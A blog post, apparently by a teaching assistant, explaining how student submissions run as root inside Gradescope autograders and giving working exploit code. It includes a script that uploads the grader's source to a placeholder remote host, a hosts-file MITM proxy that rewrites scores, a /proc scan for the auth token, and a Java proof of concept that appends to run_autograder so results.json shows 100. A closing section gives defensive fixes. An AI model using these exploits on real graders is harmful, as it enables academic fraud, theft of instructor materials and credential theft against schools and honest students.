So yeah, every script kiddie has this little dream of hacking their own school to get a perfect score.
Prologue
Gradescope is an online grading platform for schools, founded by an instructor at UC Berkeley. Its security issues were exposed long ago by some guys from MIT as their final course project [1].
I, on the other hand, just want to realize my dream of hacking my own score when things hit me hard.
Now, the MIT guys had already done a lot, including showing that we can directly read the autograder's source code and upload it to a remote server (details in the paper, section 5.3.2, or down below). But they never achieved the final step, which obviously is to change one's score freely.
Disclaimer
Now before you continue:
The following content and all associated programming code (“this work”) are written and developed for educational and research purposes only. Using this work in an uncontrolled production environment, without the permission of the owner of the autograder, may break Gradescope’s Terms of Use and may violate your affiliation’s Code of Conduct. Under no circumstances shall I be liable for any misuse of this work.
Details
First a little recap. The following is a rough flowchart of how a general Gradescope autograder works:
The line in red indicates where our code starts running. Anything before it is totally out of our control without administrative privileges (being an instructor, or having control over Gradescope's servers).
It seems we have ruled out many potential options. However, due to the nature of Gradescope's autograder, run_autograder is executed with root permissions. This means that anything running as a direct child process of run_autograder also owns root.
Our submitted code now has root permissions, and this opens up a whole new door toward arbitrary code execution.
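To see this for yourself, here is a minimal check the submitted code can run (my own sketch, nothing Gradescope-specific):

import os

# If our code really runs as a child of run_autograder, the effective
# UID should be 0 (root) -- no privilege escalation needed.
print("running as uid:", os.geteuid())
assert os.geteuid() == 0, "not root; the grader must have dropped privileges"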
Exploitation
With the power of root, we can literally traverse all the files on the server (more specifically, inside the Docker container, barring a sandbox-escape exploit) and upload them to a remote server under our control, since we also have Internet access.
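As an illustration, a minimal sketch of that exfiltration step, assuming a collection endpoint you control (the URL below is a placeholder):

import io
import tarfile
import urllib.request

# Hypothetical endpoint on a server we control.
COLLECT_URL = "https://collector.example.com/upload"

# Pack everything the grader can see -- tests, harness, instructor source.
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w:gz") as tar:
    tar.add("/autograder/source", arcname="source")

req = urllib.request.Request(
    COLLECT_URL, data=buf.getvalue(),
    headers={"Content-Type": "application/gzip"})
urllib.request.urlopen(req)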
Normies would stop here and say, “well, we have the test cases, just study them and debug your code.” ⒻⒶⒸⓉ, but not enough. As a TA myself, I tend to write large randomized fuzzing tests that generate stuff no one understands. Therefore, we need the power to change the scores directly.
Direct Output
The first thing that comes to mind is to write directly to the output file results.json. Its path is fixed (/autograder/results/results.json), and the output format is documented. It seems all we need to do is write to the file directly, and that's it.
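In the simplest documented form, a single top-level score is enough; a minimal sketch:

import json

# The minimal documented results.json: one top-level score field.
with open("/autograder/results/results.json", "w") as f:
    json.dump({"score": 100.0}, f)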
However, take a look at the flowchart and you will realize that results.json is written by run_autograder after the tests finish. Whatever we write to the file gets overwritten by the real autograder results.
This seems to have an easy fix: after our code writes to the file, set the file to immutable so the real autograder cannot overwrite it. The problem here is that Docker by default runs without the LINUX_IMMUTABLE capability, so chattr +i fails inside the container; and chmod is no help either, since root ignores permission bits, so even a file made unwritable to everyone can still be overwritten.
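You can see the capability problem directly; a minimal sketch:

import subprocess

# Even as root, this fails with "Operation not permitted" inside a
# default Docker container, because CAP_LINUX_IMMUTABLE is not granted.
subprocess.run(["chattr", "+i", "/autograder/results/results.json"], check=True)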
This is a no-go.
Direct Submission
Following the path on the flowchart, the next thing that meets my eye is the step where harness.py uploads the result via an HTTP POST request. If Gradescope automatically accepts and parses the first result that comes in, it may ignore any subsequent request.
So the plan is to send our own HTTP request to the result-submission URL. Looking into the source code of harness.py, it turns out the URL is read from an environment variable. Everything seems to be going well; the user code can successfully get the URL from the environment, but the HTTP response is simply not OK.
A deeper look into the source shows that the request needs an authentication token in its headers. The token comes from an environment variable as well, but the Gradescope developers actually paid attention to this little detail and delete the variable after it is loaded. The result is that no child process of harness.py can read it.
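The attempt looks roughly like this; a sketch only, since the actual variable names come from harness.py's source and the ones below are guesses:

import json
import os
import urllib.request

url = os.environ.get("SUBMISSION_URL")  # hypothetical name; this one survives
token = os.environ.get("AUTH_TOKEN")    # hypothetical name; already deleted -> None

req = urllib.request.Request(
    url, data=json.dumps({"score": 100.0}).encode(),
    headers={"Content-Type": "application/json"})
# Without the token header, the server rejects the forged result.
urllib.request.urlopen(req)  # raises HTTPError (4xx)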
What a pity.
thoughts…
While writing this, it occurred to me that we could spin up a fake web server that MITMs the submission. We can point the URL's hostname at a loopback address in the hosts file, make harness.py hit our fake server, change the payload, and forward it to the real remote server.
One detail needs to be taken care of: the URL uses HTTPS, meaning we have to generate a self-signed certificate and trust it locally. I'm not quite sure how Python's HTTP stack behaves here, whether it loads the trust store in time or caches it. Nonetheless, this could potentially work.
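A sketch of that idea, with a placeholder hostname and a pre-generated self-signed cert.pem/key.pem pair that the container has been made to trust:

import http.server
import json
import socket
import ssl
import urllib.request

HOST = "submission.gradescope.example"  # hypothetical; take it from the real URL
REAL_IP = socket.gethostbyname(HOST)    # resolve BEFORE poisoning the hosts file

# Point the hostname at loopback so harness.py connects to us instead.
with open("/etc/hosts", "a") as f:
    f.write("127.0.0.1 " + HOST + "\n")

class Tamper(http.server.BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers["Content-Length"])
        body = json.loads(self.rfile.read(length))
        body["score"] = 100.0  # rewrite the result in flight
        data = json.dumps(body).encode()
        # Forward by IP so we don't loop back to ourselves, keeping the
        # auth header harness.py attached. (Certificate verification
        # against a bare IP would need extra ssl handling in practice.)
        headers = dict(self.headers.items())
        headers["Content-Length"] = str(len(data))
        req = urllib.request.Request("https://" + REAL_IP + self.path,
                                     data=data, headers=headers)
        resp = urllib.request.urlopen(req)
        self.send_response(resp.status)
        self.end_headers()
        self.wfile.write(resp.read())

# cert.pem/key.pem: a self-signed pair generated beforehand and added to
# the container's trust store so harness.py accepts our server.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain("cert.pem", "key.pem")
server = http.server.HTTPServer(("127.0.0.1", 443), Tamper)
server.socket = ctx.wrap_socket(server.socket, server_side=True)
server.serve_forever()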
There could also be other methods to extract the authentication token, such as dumping the memory of the running harness.py process and searching through it. But that could be way too hardcore for our script-kiddie-oriented write-up.
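One softer variant of that idea, sketched below: /proc/<pid>/environ is a snapshot of the environment taken at exec time, so the token may still be visible there even after harness.py deletes it from its own copy. Matching on "harness.py" in the command line is my own assumption.

import os

# Scan /proc for the harness process and dump its exec-time environment.
for pid in filter(str.isdigit, os.listdir("/proc")):
    try:
        with open("/proc/%s/cmdline" % pid, "rb") as f:
            if b"harness.py" not in f.read():
                continue
        with open("/proc/%s/environ" % pid, "rb") as f:
            pairs = (kv.split(b"=", 1) for kv in f.read().split(b"\0") if b"=" in kv)
            print(dict(pairs))  # search this dump for the token variable
    except OSError:
        continue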
Bottleneck
We need to make sure results.json is changed after the real results are written, but before results.json is read and uploaded by harness.py. Looking at the flowchart, this does not leave us much room. It also seems like an impossible job: results.json is written after our code finishes executing, and how can we do anything if our code is no longer running?
Naturally, we need some kind of delayed device that keeps working after our code exits. I tried cron and sleep; both are polling-based and need precise timing, which doesn't seem to work well in this scenario (or maybe it's just bad luck on my part).
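For reference, the sleep-based attempt looks roughly like this, with a double fork so the sleeper outlives the test process; the 30-second delay is a pure guess, which is exactly why the timing is so fragile:

import json
import os
import time

# Double-fork so the sleeper detaches and survives our test's exit.
if os.fork() == 0:
    os.setsid()
    if os.fork() == 0:
        time.sleep(30)  # guess when the real results land -- fragile
        with open("/autograder/results/results.json", "w") as f:
            json.dump({"score": 100.0}, f)
    os._exit(0)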
thoughts…
While writing this, it occurred to me that we could use inotify-related utilities to watch for changes to results.json, which turns this into an interrupt-driven scenario. If we're fast enough, we may squeeze into the window between run_autograder writing the file and harness.py reading it.
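A sketch of that idea, assuming inotify-tools is installed in the container and that this watcher has been detached (e.g. with the double-fork trick above) so it survives our code's exit:

import json
import subprocess

RESULTS = "/autograder/results/results.json"

# Block (interrupt-driven, no polling) until the real results are written,
# then race harness.py to replace them.
subprocess.run(["inotifywait", "-e", "close_write", RESULTS])
with open(RESULTS, "w") as f:
    json.dump({"score": 100.0}, f)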
A New Light
All hope seems gone, although you might have already noticed the larger arrow in the flowchart: the span after the autograder result is written to results.json, but before run_autograder exits. It would be perfect if we could do something in that window, but how?
I can't help but think: can we make run_autograder do things we want it to do? At first glance this is implausible, as run_autograder is written by the instructors and is in place before our code starts running. This is true for almost all executables, since it is impossible to change the instructions of a running binary (without considering some hardcore injection, that is). This is also why we can't directly change harness.py to make it do what we want.
But run_autograder is an exception. Although the documentation says run_autograder can be any type of executable, the example provided by Gradescope is written as a shell script, so many autograders follow that path.
What's special about shell scripts? Well, shell scripts are executed line by line, which means that if we append new lines to the script before it finishes, the new lines get executed. Since run_autograder also lives at a fixed path, our life becomes tremendously easier. All we are left to do is append the commands we want executed to the end of the file, and that's it.
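If you want to convince yourself of this shell behavior first, here is a tiny self-contained demo (my own illustration, not part of the exploit):

import subprocess

# bash reads a script incrementally, so a line appended while the script
# is still running gets executed once the interpreter reaches it.
script = (
    "#!/bin/bash\n"
    "echo 'echo \"injected at runtime\"' >> \"$0\"\n"
    "sleep 1\n"
)
with open("demo.sh", "w") as f:
    f.write(script)
subprocess.run(["bash", "demo.sh"])  # prints: injected at runtime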
The Final Payload
I decided to extract a Python script to /autograder/exploit.py, and then append a single line, python /autograder/exploit.py, to the end of run_autograder. The following is the PoC code I used for a Java autograder. I also tried it with a Python autograder, which works fine as well. Other autograders should theoretically work too, as long as they use a shell script as the run_autograder file.
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.nio.file.StandardOpenOption;

public class Submission {
    public static void question1() {
        // Python payload that overwrites the final results after the
        // real autograder has produced them.
        final String exploit = "import json\n" +
                "with open('/autograder/results/results.json', 'w') as f:\n" +
                "    f.write('{\"score\": 100.0}')";
        final Path exploitPath = Paths.get("/autograder/exploit.py");
        if (Files.notExists(exploitPath)) {
            final Path agPath = Paths.get("/autograder/run_autograder");
            try {
                // Append one line to the still-running shell script; bash
                // executes it after the tests (and this code) finish.
                Files.write(agPath, "\npython /autograder/exploit.py".getBytes(),
                        StandardOpenOption.APPEND);
                Files.write(exploitPath, exploit.getBytes(),
                        StandardOpenOption.WRITE, StandardOpenOption.CREATE);
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }
}
This is a PoC exploit that overwrites the real autograder output and sets the score to 100, assuming Submission.question1() is invoked somewhere during the tests.
Prevention
According to the paper by the MIT guys, this problem has existed since at least 2016, back when the autograder was still in beta. Based on this, I'd guess the Gradescope developers are not going to fix it anytime soon.
Hence, the responsibility for preventing students from using this exploit to achieve perfect scores lies on the shoulders of us TAs.
The fix is rather easy:
- Create a new user account, say runner, that is not in the sudoers (e.g. sudo adduser runner --no-create-home --disabled-password --gecos "").
- Set all files and folders with sensitive data (run_autograder, results/, source code, etc.) to be inaccessible to other users (e.g. chmod o= <file>). However, make sure that the compiled executables or bytecode files (like .class for Java and .pyc for Python), and all related files, are still accessible to other users.
- Then, when running the test suites, run them as the user runner (e.g. prefix the line with sudo -u runner).
And this should fix the problem.
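If your run_autograder happens to be a Python script rather than a shell script, the same demotion is a one-parameter change on Python 3.9+; a sketch, where the test command itself is just a placeholder:

import subprocess

# Run the test suite as the unprivileged "runner" user -- the equivalent
# of prefixing the command with `sudo -u runner` in a shell script.
subprocess.run(
    ["java", "-cp", "/autograder/build", "TestRunner"],  # placeholder command
    user="runner", group="runner", check=True)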
This also prevents students from seeing the source code. They could still upload the compiled files and decompile them, but this should increase the difficulty a lot.
If your test suites need neither network access nor stdout, you could potentially kill those as well, so that your autograder truly becomes a black box to any student-submitted code.
Epilogue
Honestly, Gradescope lacks a lot of useful features that are essential for those of us TAs who use it for everything from homework to exam grading (there isn't even a mutually exclusive lock for grading). The situation is not any better after the acquisition by Turnitin.
If someday I get tired of dealing with it, I'll write a new online grading platform myself.